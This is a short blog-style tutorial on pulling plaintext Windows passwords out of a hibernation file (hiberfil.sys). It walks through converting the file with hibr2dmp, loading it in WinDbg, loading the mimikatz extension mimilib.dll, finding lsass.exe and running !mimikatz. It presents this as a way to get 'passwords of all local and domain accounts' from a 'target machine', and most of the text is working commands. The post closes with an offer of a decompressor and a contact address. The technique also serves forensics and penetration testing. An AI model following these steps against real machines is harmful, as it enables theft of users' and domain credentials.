Mimikatz, a tool that allows to extract Windows credentials as plain text from LSA, is available since 2012. However, besides a well-covered feature of recovering passwords from the memory of a running OS, it has another interesting capability. Further a step-by-step instructions are given, how to easily extract the Windows users credentials data from hiberfil.sys file.
Preparation
To follow these instructions we’ll need the following tools:
- Debugging Tools for Windows (WinDbg)
- Windows Memory toolkit free edition
- And mimikatz itself
Instructions
- Get hiberfil.sys from the target machine.
- Convert it into a format WinDbg can work with: hibr2dmp.exe
d:\temp\hiberfil.sys c:\temp\hiberfil.dmpIt can take some time (in our example, it took about 14 hours).
- Run WinDbg and open the file you got in the previous step.File -> Open Crash Dump
- Set the debug symbols.Open File -> Symbol File Path… and enter the next line:
SRV*c:\symbols*http://msdl.microsoft.com/download/symbols
You can specify any other directory to which the symbols are to be downloaded instead of c:\symbols
Type the following in the debugger command prompt:
0: kd> .reload /n
Wait till the symbol download is completed:
- Specify the path to mimilib.dll. (It is located in the same directory as mimikatz.)
0: kd> .load z:\Sft\Security\Password\Mimikatz\x64\mimilib.dll
- Find the address of lsass.exe.
0: kd> !process 0 0 lsass.exee
In our case the address is as follows: fffffa800a7d9060.
- Switch the process context.
0: kd> .process /r /p fffffa800a7d9060
- Run mimikatz and obtain plaint text passwords.
0:kd> !mimikatz
This way you can extract from the hibernation file passwords of all local and domain accounts, registered in the system.
We’ve analyzed the hiberfil.sys file format of Windows 8, and will release a Decompressor a month later. Anybody who want to joint us or want to own the Decompressor may mail to us, flyingdreaming@bupt.edu.cn.